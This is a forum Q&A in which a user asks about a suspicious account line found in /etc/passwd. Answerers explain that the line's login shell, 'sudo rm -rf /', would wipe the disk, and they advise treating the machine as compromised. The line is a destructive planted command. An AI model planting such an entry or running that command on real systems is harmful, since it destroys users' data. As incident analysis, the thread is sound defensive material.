# New line in /etc/passwd?

Tags: port, etcpasswd

Yesterday I noticed some new php error logs and I checked /etc/passwd

I found this new line in there:
l33th4xor:4l5aMj4l33T:666:666:H4x0R:/:/usr/bin/sudo /bin/rm -rf /

What does this actually mean,I see it got sth to be executed like rm -rf,but I'm not sure.

Could somebody explain exactly what this means,and could this user log in through this user if my 22 port was opened?

Answer (score 1):

If you allow `ssh` login, are accessible from Internet and have this line in your `passwd`, and if you allow `sudo`, if anyone executes `ssh l33th4xor@yourhost` and knows the corresponding password encrypted as `4l5aMj4l33T`, your hard drive will be wiped (`rm` "delete" `-rf` "recursively and forcefully without asking for confirmation" `/` "everything in the root directory").

Answer (score 0):

**Somebody has hacked into your machine!

You should try to investigate what else was done by the attacker, try to revert his changes and secure your machine to prevent any future attacks.**

The last part of the line in passwd is the command that gets executed on user login. Usually it is some kind of shell, but in this case the command would delete everything on the machine.

You can find more about meaning of lines in `/etc/passwd` file on the following link: http://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

Some things that I personally found interesting in the passwd line you posted:

- H4x0R --> HAXOR
- Use of 666